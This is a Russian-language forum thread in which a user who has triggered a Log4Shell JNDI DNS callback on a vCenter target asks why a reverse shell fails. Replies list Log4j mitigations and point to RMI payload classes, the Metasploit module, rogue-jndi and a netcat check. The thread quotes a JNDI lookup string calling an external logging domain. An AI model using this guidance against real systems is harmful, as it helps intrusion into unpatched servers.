169 похожих чатов

Вопрос по log4shell: Есть уязвимый таргет, при jndi:dns://mydomain.dnslog.cn стучит и все

ок
Env переменные тоже успешно добавляются в домен, так что не фолс позитив
Но реверс шелл вообще никак не отстукивает
Пробовал icmp,http,reverse tcp из мсф и никак
Если убрать за рамки что это фаерволл, то насколько я помню там было несколько патчей в log4j закрывающих дыру
Может ли дело быть в этом?Что стоит попробовать?
таргет - vcenter

5 ответов

15 просмотров

какие пакеты долетают? DNS? или из RMI что-то тоже есть?

Устранение сводилось к одному из 3: 1. Удалить класс JndiLookup из log4 ИЛИ 2. Прописать в env параметр LOG4J_FORMAT_MSG_NO_LOOKUPS = True, или log4j2.formatMsgNoLookups = True ИЛИ 3. Обновиться Вот тут все есть: https://logging.apache.org/log4j/2.x/security.html Но почему шелл не прокидывается если честно хз

Пробовал icmp,http,reverse tcp из мсф и никак ты типо такой пэйлоад пробовал дернуть?)) если так, то тебе только в путь читать про RMI в JAVA. Тебе нужно будет собрать класс с пэйлоадом и потом поднять listener. И дальше уже в него стучаться

🐘🐘🐘- Автор вопроса
Дмитрий Курамин
Пробовал icmp,http,reverse tcp из мсф и никак ты т...

Сплойт есть в мсф Так же пытался делать через roguejndi

🐘🐘🐘
Сплойт есть в мсф Так же пытался делать через rogu...

подними порт неткатом и попробуй в него постучаться. Ты должен будешь увидеть JRMIK если не будет, значит что-то делаешь не так

Похожие вопросы

Обсуждают сегодня

30500 за редактор? )
Владимир
47
а через ESC-код ?
Alexey Kulakov
29
Чёт не понял, я ж правильной функцией воспользовался чтобы вывести отладочную информацию? но что-то она не ловится
notme
18
У меня есть функция где происходит это: write_bit(buffer, 1); write_bit(buffer, 0); write_bit(buffer, 1); write_bit(buffer, 1); write_bit(buffer, 1); w...
~
13
Недавно Google Project Zero нашёл багу в SQLite с помощью LLM, о чём достаточно было шумно в определённых интернетах, которые сопровождались рассказами, что скоро всех "ибешни...
Alex Sherbakov
5
Ребят в СИ можно реализовать ООП?
Николай
33
Как передать управляющий символ в открытую через CreateProcess консоль? Собсна, есть процедура: procedure TRedirectThread.WriteData(Data: OEMString); var Written: Cardinal;...
Serjone
6
в JclConsole объявлено так: function CtrlHandler(CtrlType: DWORD): BOOL; stdcall; - где ваше объявление с stdcall? у вас на картинке нет stdcall
Karagy
8
https://github.com/erlang/otp/blob/OTP-27.1/lib/kernel/src/logger_h_common.erl#L174 https://github.com/erlang/otp/blob/OTP-27.1/lib/kernel/src/logger_olp.erl#L76 15 лет назад...
Maksim Lapshin
20
program test; {$mode delphi} procedure proc(v: int32); overload; begin end; procedure proc(v: int64); overload; begin end; var x: uint64; begin proc(x); end. Уж не знаю...
notme
6
Карта сайта